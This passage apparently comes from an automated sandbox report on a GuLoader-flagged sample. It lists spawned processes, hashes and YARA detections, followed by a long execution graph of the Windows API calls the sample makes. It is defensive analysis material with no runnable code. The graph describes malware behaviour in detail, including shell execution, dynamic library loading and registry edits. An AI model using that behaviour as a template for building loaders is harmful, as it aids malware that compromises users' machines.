                                                                Imagebase:0x450000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1837590498.000000000A812000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:22:26:00
                                                                Start date:10/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:22:26:46
                                                                Start date:10/01/2025
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0xb0000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2599692281.0000000004F02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:21.6%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:21.3%
                                                                  Total number of Nodes:1264
                                                                  Total number of Limit Nodes:31
                                                                  execution_graph 3493 401d41 GetDC GetDeviceCaps 3494 402b1b 18 API calls 3493->3494 3495 401d5f MulDiv ReleaseDC 3494->3495 3496 402b1b 18 API calls 3495->3496 3497 401d7e 3496->3497 3498 405dc3 18 API calls 3497->3498 3499 401db7 CreateFontIndirectW 3498->3499 3500 4024e6 3499->3500 3501 401a42 3502 402b1b 18 API calls 3501->3502 3503 401a48 3502->3503 3504 402b1b 18 API calls 3503->3504 3505 4019f0 3504->3505 3506 402744 3507 40273f 3506->3507 3507->3506 3508 402754 FindNextFileW 3507->3508 3509 4027a6 3508->3509 3510 40275f 3508->3510 3512 405da1 lstrcpynW 3509->3512 3512->3510 3513 401cc6 3514 402b1b 18 API calls 3513->3514 3515 401cd9 SetWindowLongW 3514->3515 3516 4029c5 3515->3516 3517 4049c7 GetDlgItem GetDlgItem 3518 404a19 7 API calls 3517->3518 3526 404c32 3517->3526 3519 404abc DeleteObject 3518->3519 3520 404aaf SendMessageW 3518->3520 3521 404ac5 3519->3521 3520->3519 3523 404afc 3521->3523 3525 405dc3 18 API calls 3521->3525 3522 404d16 3524 404dc2 3522->3524 3529 404c25 3522->3529 3534 404d6f SendMessageW 3522->3534 3527 403fe6 19 API calls 3523->3527 3530 404dd4 3524->3530 3531 404dcc SendMessageW 3524->3531 3532 404ade SendMessageW SendMessageW 3525->3532 3526->3522 3546 404ca3 3526->3546 3570 404915 SendMessageW 3526->3570 3528 404b10 3527->3528 3533 403fe6 19 API calls 3528->3533 3535 40404d 8 API calls 3529->3535 3541 404de6 ImageList_Destroy 3530->3541 3542 404ded 3530->3542 3547 404dfd 3530->3547 3531->3530 3532->3521 3550 404b1e 3533->3550 3534->3529 3539 404d84 SendMessageW 3534->3539 3540 404fb8 3535->3540 3536 404d08 SendMessageW 3536->3522 3538 404f6c 3538->3529 3548 404f7e ShowWindow GetDlgItem ShowWindow 3538->3548 3545 404d97 3539->3545 3541->3542 3543 404df6 GlobalFree 3542->3543 3542->3547 3543->3547 3544 404bf3 GetWindowLongW SetWindowLongW 3549 404c0c 3544->3549 3555 404da8 SendMessageW 3545->3555 3546->3522 3546->3536 3547->3538 3564 404e38 3547->3564 3575 404995 3547->3575 3548->3529 3551 404c12 ShowWindow 3549->3551 3552 404c2a 3549->3552 3550->3544 3554 404b6e SendMessageW 3550->3554 3556 404bed 3550->3556 3558 404baa SendMessageW 3550->3558 3559 404bbb SendMessageW 3550->3559 3568 40401b SendMessageW 3551->3568 3569 40401b SendMessageW 3552->3569 3554->3550 3555->3524 3556->3544 3556->3549 3558->3550 3559->3550 3561 404f42 InvalidateRect 3561->3538 3562 404f58 3561->3562 3584 40482f 3562->3584 3563 404e66 SendMessageW 3566 404e7c 3563->3566 3564->3563 3564->3566 3566->3561 3567 404ef0 SendMessageW SendMessageW 3566->3567 3567->3566 3568->3529 3569->3526 3571 404974 SendMessageW 3570->3571 3572 404938 GetMessagePos ScreenToClient SendMessageW 3570->3572 3573 40496c 3571->3573 3572->3573 3574 404971 3572->3574 3573->3546 3574->3571 3592 405da1 lstrcpynW 3575->3592 3577 4049a8 3593 405ce8 wsprintfW 3577->3593 3579 4049b2 3580 40140b 2 API calls 3579->3580 3581 4049bb 3580->3581 3594 405da1 lstrcpynW 3581->3594 3583 4049c2 3583->3564 3585 40484c 3584->3585 3586 405dc3 18 API calls 3585->3586 3587 404881 3586->3587 3588 405dc3 18 API calls 3587->3588 3589 40488c 3588->3589 3590 405dc3 18 API calls 3589->3590 3591 4048bd lstrlenW wsprintfW SetDlgItemTextW 3590->3591 3591->3538 3592->3577 3593->3579 3594->3583 3595 401dc7 3596 402b1b 18 API calls 3595->3596 3597 401dcd 3596->3597 3598 402b1b 18 API calls 3597->3598 3599 401dd6 3598->3599 3600 401de8 EnableWindow 3599->3600 3601 401ddd ShowWindow 3599->3601 3602 4029c5 3600->3602 3601->3602 3603 4047c9 3604 4047f5 3603->3604 3605 4047d9 3603->3605 3606 404828 3604->3606 3607 4047fb SHGetPathFromIDListW 3604->3607 3614 405561 GetDlgItemTextW 3605->3614 3609 404812 SendMessageW 3607->3609 3610 40480b 3607->3610 3609->3606 3612 40140b 2 API calls 3610->3612 3611 4047e6 SendMessageW 3611->3604 3612->3609 3614->3611 3615 401bca 3616 402b1b 18 API calls 3615->3616 3617 401bd1 3616->3617 3618 402b1b 18 API calls 3617->3618 3619 401bdb 3618->3619 3621 402b38 18 API calls 3619->3621 3625 401beb 3619->3625 3620 401bfb 3623 401c06 3620->3623 3624 401c4a 3620->3624 3621->3625 3622 402b38 18 API calls 3622->3620 3626 402b1b 18 API calls 3623->3626 3627 402b38 18 API calls 3624->3627 3625->3620 3625->3622 3628 401c0b 3626->3628 3629 401c4f 3627->3629 3630 402b1b 18 API calls 3628->3630 3631 402b38 18 API calls 3629->3631 3633 401c14 3630->3633 3632 401c58 FindWindowExW 3631->3632 3636 401c7a 3632->3636 3634 401c3a SendMessageW 3633->3634 3635 401c1c SendMessageTimeoutW 3633->3635 3634->3636 3635->3636 3637 4024ca 3638 402b38 18 API calls 3637->3638 3639 4024d1 3638->3639 3642 405a0d GetFileAttributesW CreateFileW 3639->3642 3641 4024dd 3642->3641 3643 40194b 3644 402b1b 18 API calls 3643->3644 3645 401952 3644->3645 3646 402b1b 18 API calls 3645->3646 3647 40195c 3646->3647 3648 402b38 18 API calls 3647->3648 3649 401965 3648->3649 3650 401979 lstrlenW 3649->3650 3651 4019b5 3649->3651 3652 401983 3650->3652 3652->3651 3656 405da1 lstrcpynW 3652->3656 3654 40199e 3654->3651 3655 4019ab lstrlenW 3654->3655 3655->3651 3656->3654 3660 4019cf 3661 402b38 18 API calls 3660->3661 3662 4019d6 3661->3662 3663 402b38 18 API calls 3662->3663 3664 4019df 3663->3664 3665 4019e6 lstrcmpiW 3664->3665 3666 4019f8 lstrcmpW 3664->3666 3667 4019ec 3665->3667 3666->3667 3343 401e51 3344 402b38 18 API calls 3343->3344 3345 401e57 3344->3345 3346 40504b 25 API calls 3345->3346 3347 401e61 3346->3347 3348 40551c 2 API calls 3347->3348 3349 401e67 3348->3349 3350 401ec6 CloseHandle 3349->3350 3351 401e77 WaitForSingleObject 3349->3351 3353 402791 3349->3353 3350->3353 3352 401e89 3351->3352 3354 401e9b GetExitCodeProcess 3352->3354 3355 406144 2 API calls 3352->3355 3356 401eba 3354->3356 3357 401ead 3354->3357 3358 401e90 WaitForSingleObject 3355->3358 3356->3350 3360 401eb8 3356->3360 3361 405ce8 wsprintfW 3357->3361 3358->3352 3360->3350 3361->3360 3668 402251 3669 40225f 3668->3669 3670 402259 3668->3670 3672 402b38 18 API calls 3669->3672 3674 40226d 3669->3674 3671 402b38 18 API calls 3670->3671 3671->3669 3672->3674 3673 40227b 3676 402b38 18 API calls 3673->3676 3674->3673 3675 402b38 18 API calls 3674->3675 3675->3673 3677 402284 WritePrivateProfileStringW 3676->3677 3362 401752 3363 402b38 18 API calls 3362->3363 3364 401759 3363->3364 3365 401781 3364->3365 3366 401779 3364->3366 3402 405da1 lstrcpynW 3365->3402 3401 405da1 lstrcpynW 3366->3401 3369 40177f 3373 406035 5 API calls 3369->3373 3370 40178c 3371 4057ec 3 API calls 3370->3371 3372 401792 lstrcatW 3371->3372 3372->3369 3375 40179e 3373->3375 3374 4060e4 2 API calls 3374->3375 3375->3374 3376 4059e8 2 API calls 3375->3376 3378 4017b0 CompareFileTime 3375->3378 3379 401870 3375->3379 3381 401847 3375->3381 3384 405da1 lstrcpynW 3375->3384 3388 405dc3 18 API calls 3375->3388 3396 40557d MessageBoxIndirectW 3375->3396 3400 405a0d GetFileAttributesW CreateFileW 3375->3400 3376->3375 3378->3375 3380 40504b 25 API calls 3379->3380 3382 40187a 3380->3382 3383 40504b 25 API calls 3381->3383 3390 40185c 3381->3390 3385 402fa0 33 API calls 3382->3385 3383->3390 3384->3375 3386 40188d 3385->3386 3387 4018a1 SetFileTime 3386->3387 3389 4018b3 CloseHandle 3386->3389 3387->3389 3388->3375 3389->3390 3391 4018c4 3389->3391 3392 4018c9 3391->3392 3393 4018dc 3391->3393 3394 405dc3 18 API calls 3392->3394 3395 405dc3 18 API calls 3393->3395 3397 4018d1 lstrcatW 3394->3397 3398 4018e4 3395->3398 3396->3375 3397->3398 3399 40557d MessageBoxIndirectW 3398->3399 3399->3390 3400->3375 3401->3369 3402->3370 3678 402452 3679 402c42 19 API calls 3678->3679 3680 40245c 3679->3680 3681 402b1b 18 API calls 3680->3681 3682 402465 3681->3682 3683 402489 RegEnumValueW 3682->3683 3684 40247d RegEnumKeyW 3682->3684 3685 402791 3682->3685 3683->3685 3686 4024a2 RegCloseKey 3683->3686 3684->3686 3686->3685 3403 4022d3 3404 402303 3403->3404 3405 4022d8 3403->3405 3407 402b38 18 API calls 3404->3407 3416 402c42 3405->3416 3408 40230a 3407->3408 3420 402b78 RegOpenKeyExW 3408->3420 3409 4022df 3410 4022e9 3409->3410 3415 402322 3409->3415 3411 402b38 18 API calls 3410->3411 3413 4022f0 RegDeleteValueW RegCloseKey 3411->3413 3413->3415 3417 402b38 18 API calls 3416->3417 3418 402c5b 3417->3418 3419 402c69 RegOpenKeyExW 3418->3419 3419->3409 3426 402ba3 3420->3426 3428 402320 3420->3428 3421 402bc9 RegEnumKeyW 3422 402bdb RegCloseKey 3421->3422 3421->3426 3424 40610b 3 API calls 3422->3424 3423 402c00 RegCloseKey 3423->3428 3427 402beb 3424->3427 3425 402b78 3 API calls 3425->3426 3426->3421 3426->3422 3426->3423 3426->3425 3427->3428 3429 402c1b RegDeleteKeyW 3427->3429 3428->3415 3429->3428 3688 401ed4 3689 402b38 18 API calls 3688->3689 3690 401edb 3689->3690 3691 4060e4 2 API calls 3690->3691 3692 401ee1 3691->3692 3694 401ef2 3692->3694 3695 405ce8 wsprintfW 3692->3695 3695->3694 3696 4014d7 3697 402b1b 18 API calls 3696->3697 3698 4014dd Sleep 3697->3698 3700 4029c5 3698->3700 3701 40155b 3702 40296b 3701->3702 3705 405ce8 wsprintfW 3702->3705 3704 402970 3705->3704 3706 40165e 3707 402b38 18 API calls 3706->3707 3708 401665 3707->3708 3709 402b38 18 API calls 3708->3709 3710 40166e 3709->3710 3711 402b38 18 API calls 3710->3711 3712 401677 MoveFileW 3711->3712 3713 401683 3712->3713 3714 40168a 3712->3714 3715 401423 25 API calls 3713->3715 3716 4060e4 2 API calls 3714->3716 3718 402195 3714->3718 3715->3718 3717 401699 3716->3717 3717->3718 3719 405c3b 40 API calls 3717->3719 3719->3713 3720 4023de 3721 402c42 19 API calls 3720->3721 3722 4023e8 3721->3722 3723 402b38 18 API calls 3722->3723 3724 4023f1 3723->3724 3725 4023fc RegQueryValueExW 3724->3725 3728 402791 3724->3728 3726 402422 RegCloseKey 3725->3726 3727 40241c 3725->3727 3726->3728 3727->3726 3731 405ce8 wsprintfW 3727->3731 3731->3726 3732 401ce5 GetDlgItem GetClientRect 3733 402b38 18 API calls 3732->3733 3734 401d17 LoadImageW SendMessageW 3733->3734 3735 4029c5 3734->3735 3736 401d35 DeleteObject 3734->3736 3736->3735 3737 40206a 3738 402b38 18 API calls 3737->3738 3739 402071 3738->3739 3740 402b38 18 API calls 3739->3740 3741 40207b 3740->3741 3742 402b38 18 API calls 3741->3742 3743 402084 3742->3743 3744 402b38 18 API calls 3743->3744 3745 40208e 3744->3745 3746 402b38 18 API calls 3745->3746 3747 402098 3746->3747 3748 4020ac CoCreateInstance 3747->3748 3749 402b38 18 API calls 3747->3749 3752 4020cb 3748->3752 3749->3748 3750 401423 25 API calls 3751 402195 3750->3751 3752->3750 3752->3751 3753 40156b 3754 401584 3753->3754 3755 40157b ShowWindow 3753->3755 3756 401592 ShowWindow 3754->3756 3757 4029c5 3754->3757 3755->3754 3756->3757 3758 4024ec 3759 4024f1 3758->3759 3760 40250a 3758->3760 3761 402b1b 18 API calls 3759->3761 3762 402510 3760->3762 3763 40253c 3760->3763 3768 4024f8 3761->3768 3764 402b38 18 API calls 3762->3764 3765 402b38 18 API calls 3763->3765 3766 402517 WideCharToMultiByte lstrlenA 3764->3766 3767 402543 lstrlenW 3765->3767 3766->3768 3767->3768 3769 402565 WriteFile 3768->3769 3770 402791 3768->3770 3769->3770 3771 40276e 3772 402b38 18 API calls 3771->3772 3773 402775 FindFirstFileW 3772->3773 3774 402788 3773->3774 3775 40279d 3773->3775 3776 4027a6 3775->3776 3779 405ce8 wsprintfW 3775->3779 3780 405da1 lstrcpynW 3776->3780 3779->3776 3780->3774 3781 4018ef 3782 401926 3781->3782 3783 402b38 18 API calls 3782->3783 3784 40192b 3783->3784 3785 405629 71 API calls 3784->3785 3786 401934 3785->3786 3787 402571 3788 402b1b 18 API calls 3787->3788 3792 402580 3788->3792 3789 40269e 3790 4025c6 ReadFile 3790->3789 3790->3792 3791 405a90 ReadFile 3791->3792 3792->3789 3792->3790 3792->3791 3793 4026a0 3792->3793 3794 402606 MultiByteToWideChar 3792->3794 3796 4026b1 3792->3796 3797 40262c SetFilePointer MultiByteToWideChar 3792->3797 3799 405ce8 wsprintfW 3793->3799 3794->3792 3796->3789 3798 4026d2 SetFilePointer 3796->3798 3797->3792 3798->3789 3799->3789 3800 4014f1 SetForegroundWindow 3801 4029c5 3800->3801 3802 4018f2 3803 402b38 18 API calls 3802->3803 3804 4018f9 3803->3804 3805 40557d MessageBoxIndirectW 3804->3805 3806 401902 3805->3806 3430 401df3 3431 402b38 18 API calls 3430->3431 3432 401df9 3431->3432 3433 402b38 18 API calls 3432->3433 3434 401e02 3433->3434 3435 402b38 18 API calls 3434->3435 3436 401e0b 3435->3436 3437 402b38 18 API calls 3436->3437 3438 401e14 3437->3438 3442 401423 3438->3442 3441 401e4c 3443 40504b 25 API calls 3442->3443 3444 401431 ShellExecuteW 3443->3444 3444->3441 3812 4026f7 3813 4026fe 3812->3813 3815 402970 3812->3815 3814 402b1b 18 API calls 3813->3814 3816 402709 3814->3816 3817 402710 SetFilePointer 3816->3817 3817->3815 3818 402720 3817->3818 3820 405ce8 wsprintfW 3818->3820 3820->3815 3821 4040fa lstrcpynW lstrlenW 3822 402c7d 3823 402c8f SetTimer 3822->3823 3824 402ca8 3822->3824 3823->3824 3825 402cfd 3824->3825 3826 402cc2 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3824->3826 3826->3825 3827 4014ff 3828 401507 3827->3828 3829 40151a 3827->3829 3830 402b1b 18 API calls 3828->3830 3830->3829 3831 401000 3832 401037 BeginPaint GetClientRect 3831->3832 3833 40100c DefWindowProcW 3831->3833 3835 4010f3 3832->3835 3836 401179 3833->3836 3837 401073 CreateBrushIndirect FillRect DeleteObject 3835->3837 3838 4010fc 3835->3838 3837->3835 3839 401102 CreateFontIndirectW 3838->3839 3840 401167 EndPaint 3838->3840 3839->3840 3841 401112 6 API calls 3839->3841 3840->3836 3841->3840 3842 401a00 3843 402b38 18 API calls 3842->3843 3844 401a09 ExpandEnvironmentStringsW 3843->3844 3845 401a1d 3844->3845 3847 401a30 3844->3847 3846 401a22 lstrcmpW 3845->3846 3845->3847 3846->3847 3848 401b01 3849 402b38 18 API calls 3848->3849 3850 401b08 3849->3850 3851 402b1b 18 API calls 3850->3851 3852 401b11 wsprintfW 3851->3852 3853 4029c5 3852->3853 3854 404481 3855 4044ad 3854->3855 3856 4044be 3854->3856 3915 405561 GetDlgItemTextW 3855->3915 3858 4044ca GetDlgItem 3856->3858 3863 404529 3856->3863 3861 4044de 3858->3861 3859 40460d 3913 4047ae 3859->3913 3917 405561 GetDlgItemTextW 3859->3917 3860 4044b8 3862 406035 5 API calls 3860->3862 3865 4044f2 SetWindowTextW 3861->3865 3866 405897 4 API calls 3861->3866 3862->3856 3863->3859 3867 405dc3 18 API calls 3863->3867 3863->3913 3869 403fe6 19 API calls 3865->3869 3871 4044e8 3866->3871 3872 40459d SHBrowseForFolderW 3867->3872 3868 40463d 3873 4058f4 18 API calls 3868->3873 3874 40450e 3869->3874 3870 40404d 8 API calls 3875 4047c2 3870->3875 3871->3865 3879 4057ec 3 API calls 3871->3879 3872->3859 3876 4045b5 CoTaskMemFree 3872->3876 3877 404643 3873->3877 3878 403fe6 19 API calls 3874->3878 3880 4057ec 3 API calls 3876->3880 3918 405da1 lstrcpynW 3877->3918 3881 40451c 3878->3881 3879->3865 3882 4045c2 3880->3882 3916 40401b SendMessageW 3881->3916 3885 4045f9 SetDlgItemTextW 3882->3885 3890 405dc3 18 API calls 3882->3890 3885->3859 3886 404522 3888 40610b 3 API calls 3886->3888 3887 40465a 3889 40610b 3 API calls 3887->3889 3888->3863 3896 404662 3889->3896 3891 4045e1 lstrcmpiW 3890->3891 3891->3885 3894 4045f2 lstrcatW 3891->3894 3892 4046a1 3919 405da1 lstrcpynW 3892->3919 3894->3885 3895 4046a8 3897 405897 4 API calls 3895->3897 3896->3892 3898 4046f3 3896->3898 3901 405838 2 API calls 3896->3901 3899 4046ae GetDiskFreeSpaceW 3897->3899 3903 40475d 3898->3903 3905 40482f 21 API calls 3898->3905 3899->3898 3902 4046d1 MulDiv 3899->3902 3901->3896 3902->3898 3904 404780 3903->3904 3906 40140b 2 API calls 3903->3906 3920 404008 KiUserCallbackDispatcher 3904->3920 3907 40474f 3905->3907 3906->3904 3909 404754 3907->3909 3910 40475f SetDlgItemTextW 3907->3910 3912 40482f 21 API calls 3909->3912 3910->3903 3911 40479c 3911->3913 3921 404416 3911->3921 3912->3903 3913->3870 3915->3860 3916->3886 3917->3868 3918->3887 3919->3895 3920->3911 3922 404424 3921->3922 3923 404429 SendMessageW 3921->3923 3922->3923 3923->3913 3924 404183 3926 4042b5 3924->3926 3927 40419b 3924->3927 3925 40431f 3928 4043f1 3925->3928 3929 404329 GetDlgItem 3925->3929 3926->3925 3926->3928 3933 4042f0 GetDlgItem SendMessageW 3926->3933 3930 403fe6 19 API calls 3927->3930 3935 40404d 8 API calls 3928->3935 3931 4043b2 3929->3931 3932 404343 3929->3932 3934 404202 3930->3934 3931->3928 3940 4043c4 3931->3940 3932->3931 3939 404369 6 API calls 3932->3939 3955 404008 KiUserCallbackDispatcher 3933->3955 3937 403fe6 19 API calls 3934->3937 3938 4043ec 3935->3938 3942 40420f CheckDlgButton 3937->3942 3939->3931 3943 4043da 3940->3943 3944 4043ca SendMessageW 3940->3944 3941 40431a 3946 404416 SendMessageW 3941->3946 3953 404008 KiUserCallbackDispatcher 3942->3953 3943->3938 3945 4043e0 SendMessageW 3943->3945 3944->3943 3945->3938 3946->3925 3948 40422d GetDlgItem 3954 40401b SendMessageW 3948->3954 3950 404243 SendMessageW 3951 404260 GetSysColor 3950->3951 3952 404269 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3950->3952 3951->3952 3952->3938 3953->3948 3954->3950 3955->3941 2901 401f08 2902 402b38 18 API calls 2901->2902 2903 401f0f GetFileVersionInfoSizeW 2902->2903 2904 4029c5 2903->2904 2905 401f36 GlobalAlloc 2903->2905 2905->2904 2906 401f4a GetFileVersionInfoW 2905->2906 2907 401f59 VerQueryValueW 2906->2907 2908 401f8c 2906->2908 2907->2908 2909 401f72 2907->2909 2908->2904 2913 405ce8 wsprintfW 2909->2913 2911 401f7e 2914 405ce8 wsprintfW 2911->2914 2913->2911 2914->2908 3181 40518a 3182 405336 3181->3182 3183 4051ab GetDlgItem GetDlgItem GetDlgItem 3181->3183 3185 405367 3182->3185 3186 40533f GetDlgItem CreateThread CloseHandle 3182->3186 3226 40401b SendMessageW 3183->3226 3188 405392 3185->3188 3189 4053b7 3185->3189 3190 40537e ShowWindow ShowWindow 3185->3190 3186->3185 3249 40511e 5 API calls 3186->3249 3187 40521c 3195 405223 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3187->3195 3192 4053a6 3188->3192 3193 4053cc ShowWindow 3188->3193 3196 4053f2 3188->3196 3235 40404d 3189->3235 3231 40401b SendMessageW 3190->3231 3232 403fbf 3192->3232 3200 4053ec 3193->3200 3201 4053de 3193->3201 3202 405292 3195->3202 3203 405276 SendMessageW SendMessageW 3195->3203 3196->3189 3197 405400 SendMessageW 3196->3197 3199 4053c5 3197->3199 3204 405419 CreatePopupMenu 3197->3204 3208 403fbf SendMessageW 3200->3208 3207 40504b 25 API calls 3201->3207 3205 4052a5 3202->3205 3206 405297 SendMessageW 3202->3206 3203->3202 3209 405dc3 18 API calls 3204->3209 3227 403fe6 3205->3227 3206->3205 3207->3200 3208->3196 3211 405429 AppendMenuW 3209->3211 3213 405446 GetWindowRect 3211->3213 3214 405459 TrackPopupMenu 3211->3214 3212 4052b5 3215 4052f2 GetDlgItem SendMessageW 3212->3215 3216 4052be ShowWindow 3212->3216 3213->3214 3214->3199 3217 405474 3214->3217 3215->3199 3219 405319 SendMessageW SendMessageW 3215->3219 3218 4052d4 ShowWindow 3216->3218 3221 4052e1 3216->3221 3220 405490 SendMessageW 3217->3220 3218->3221 3219->3199 3220->3220 3222 4054ad OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3220->3222 3230 40401b SendMessageW 3221->3230 3224 4054d2 SendMessageW 3222->3224 3224->3224 3225 4054fb GlobalUnlock SetClipboardData CloseClipboard 3224->3225 3225->3199 3226->3187 3228 405dc3 18 API calls 3227->3228 3229 403ff1 SetDlgItemTextW 3228->3229 3229->3212 3230->3215 3231->3188 3233 403fc6 3232->3233 3234 403fcc SendMessageW 3232->3234 3233->3234 3234->3189 3236 404065 GetWindowLongW 3235->3236 3237 4040ee 3235->3237 3236->3237 3238 404076 3236->3238 3237->3199 3239 404085 GetSysColor 3238->3239 3240 404088 3238->3240 3239->3240 3241 404098 SetBkMode 3240->3241 3242 40408e SetTextColor 3240->3242 3243 4040b0 GetSysColor 3241->3243 3244 4040b6 3241->3244 3242->3241 3243->3244 3245 4040c7 3244->3245 3246 4040bd SetBkColor 3244->3246 3245->3237 3247 4040e1 CreateBrushIndirect 3245->3247 3248 4040da DeleteObject 3245->3248 3246->3245 3247->3237 3248->3247 3250 403b0e 3251 403c61 3250->3251 3252 403b26 3250->3252 3254 403c72 GetDlgItem GetDlgItem 3251->3254 3255 403cb2 3251->3255 3252->3251 3253 403b32 3252->3253 3256 403b50 3253->3256 3257 403b3d SetWindowPos 3253->3257 3258 403fe6 19 API calls 3254->3258 3259 403d0c 3255->3259 3264 401389 2 API calls 3255->3264 3261 403b55 ShowWindow 3256->3261 3262 403b6d 3256->3262 3257->3256 3263 403c9c SetClassLongW 3258->3263 3260 404032 SendMessageW 3259->3260 3282 403c5c 3259->3282 3280 403d1e 3260->3280 3261->3262 3265 403b75 DestroyWindow 3262->3265 3266 403b8f 3262->3266 3267 40140b 2 API calls 3263->3267 3268 403ce4 3264->3268 3319 403f6f 3265->3319 3269 403b94 SetWindowLongW 3266->3269 3270 403ba5 3266->3270 3267->3255 3268->3259 3271 403ce8 SendMessageW 3268->3271 3269->3282 3274 403bb1 GetDlgItem 3270->3274 3275 403c4e 3270->3275 3271->3282 3272 40140b 2 API calls 3272->3280 3273 403f71 DestroyWindow EndDialog 3273->3319 3276 403be1 3274->3276 3277 403bc4 SendMessageW IsWindowEnabled 3274->3277 3278 40404d 8 API calls 3275->3278 3281 403be6 3276->3281 3284 403bee 3276->3284 3285 403c35 SendMessageW 3276->3285 3286 403c01 3276->3286 3277->3276 3277->3282 3278->3282 3279 403fa0 ShowWindow 3279->3282 3280->3272 3280->3273 3280->3282 3283 405dc3 18 API calls 3280->3283 3292 403fe6 19 API calls 3280->3292 3295 403fe6 19 API calls 3280->3295 3310 403eb1 DestroyWindow 3280->3310 3287 403fbf SendMessageW 3281->3287 3283->3280 3284->3281 3284->3285 3285->3275 3288 403c09 3286->3288 3289 403c1e 3286->3289 3290 403c1c 3287->3290 3293 40140b 2 API calls 3288->3293 3291 40140b 2 API calls 3289->3291 3290->3275 3294 403c25 3291->3294 3292->3280 3293->3281 3294->3275 3294->3281 3296 403d99 GetDlgItem 3295->3296 3297 403db6 ShowWindow KiUserCallbackDispatcher 3296->3297 3298 403dae 3296->3298 3320 404008 KiUserCallbackDispatcher 3297->3320 3298->3297 3300 403de0 EnableWindow 3303 403df4 3300->3303 3301 403df9 GetSystemMenu EnableMenuItem SendMessageW 3302 403e29 SendMessageW 3301->3302 3301->3303 3302->3303 3303->3301 3321 40401b SendMessageW 3303->3321 3322 405da1 lstrcpynW 3303->3322 3306 403e57 lstrlenW 3307 405dc3 18 API calls 3306->3307 3308 403e6d SetWindowTextW 3307->3308 3309 401389 2 API calls 3308->3309 3309->3280 3311 403ecb CreateDialogParamW 3310->3311 3310->3319 3312 403efe 3311->3312 3311->3319 3313 403fe6 19 API calls 3312->3313 3314 403f09 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3313->3314 3315 401389 2 API calls 3314->3315 3316 403f4f 3315->3316 3316->3282 3317 403f57 ShowWindow 3316->3317 3318 404032 SendMessageW 3317->3318 3318->3319 3319->3279 3319->3282 3320->3300 3321->3303 3322->3306 3956 401491 3957 40504b 25 API calls 3956->3957 3958 401498 3957->3958 3959 402293 3960 402b38 18 API calls 3959->3960 3961 4022a2 3960->3961 3962 402b38 18 API calls 3961->3962 3963 4022ab 3962->3963 3964 402b38 18 API calls 3963->3964 3965 4022b5 GetPrivateProfileStringW 3964->3965 3445 401f98 3446 401faa 3445->3446 3456 40205c 3445->3456 3447 402b38 18 API calls 3446->3447 3449 401fb1 3447->3449 3448 401423 25 API calls 3451 402195 3448->3451 3450 402b38 18 API calls 3449->3450 3452 401fba 3450->3452 3453 401fd0 LoadLibraryExW 3452->3453 3454 401fc2 GetModuleHandleW 3452->3454 3455 401fe1 3453->3455 3453->3456 3454->3453 3454->3455 3465 406177 WideCharToMultiByte 3455->3465 3456->3448 3459 401ff2 3462 401423 25 API calls 3459->3462 3463 402002 3459->3463 3460 40202b 3461 40504b 25 API calls 3460->3461 3461->3463 3462->3463 3463->3451 3464 40204e FreeLibrary 3463->3464 3464->3451 3466 4061a1 GetProcAddress 3465->3466 3467 401fec 3465->3467 3466->3467 3467->3459 3467->3460 3966 401718 3967 402b38 18 API calls 3966->3967 3968 40171f SearchPathW 3967->3968 3969 40173a 3968->3969 3970 40159b 3971 402b38 18 API calls 3970->3971 3972 4015a2 SetFileAttributesW 3971->3972 3973 4015b4 3972->3973 3974 40149e 3975 4014ac PostQuitMessage 3974->3975 3976 40223c 3974->3976 3975->3976 3977 40219e 3978 402b38 18 API calls 3977->3978 3979 4021a4 3978->3979 3980 402b38 18 API calls 3979->3980 3981 4021ad 3980->3981 3982 402b38 18 API calls 3981->3982 3983 4021b6 3982->3983 3984 4060e4 2 API calls 3983->3984 3985 4021bf 3984->3985 3986 4021d0 lstrlenW lstrlenW 3985->3986 3990 4021c3 3985->3990 3988 40504b 25 API calls 3986->3988 3987 40504b 25 API calls 3991 4021cb 3987->3991 3989 40220e SHFileOperationW 3988->3989 3989->3990 3989->3991 3990->3987 3990->3991 3992 4029a0 SendMessageW 3993 4029c5 3992->3993 3994 4029ba InvalidateRect 3992->3994 3994->3993 3995 401b22 3996 401b73 3995->3996 3997 401b2f 3995->3997 3999 401b78 3996->3999 4000 401b9d GlobalAlloc 3996->4000 3998 402229 3997->3998 4004 401b46 3997->4004 4002 405dc3 18 API calls 3998->4002 4006 401bb8 3999->4006 4016 405da1 lstrcpynW 3999->4016 4001 405dc3 18 API calls 4000->4001 4001->4006 4007 402236 4002->4007 4014 405da1 lstrcpynW 4004->4014 4005 401b8a GlobalFree 4005->4006 4009 40557d MessageBoxIndirectW 4007->4009 4009->4006 4010 401b55 4015 405da1 lstrcpynW 4010->4015 4012 401b64 4017 405da1 lstrcpynW 4012->4017 4014->4010 4015->4012 4016->4005 4017->4006 4018 402222 4019 402229 4018->4019 4021 40223c 4018->4021 4020 405dc3 18 API calls 4019->4020 4022 402236 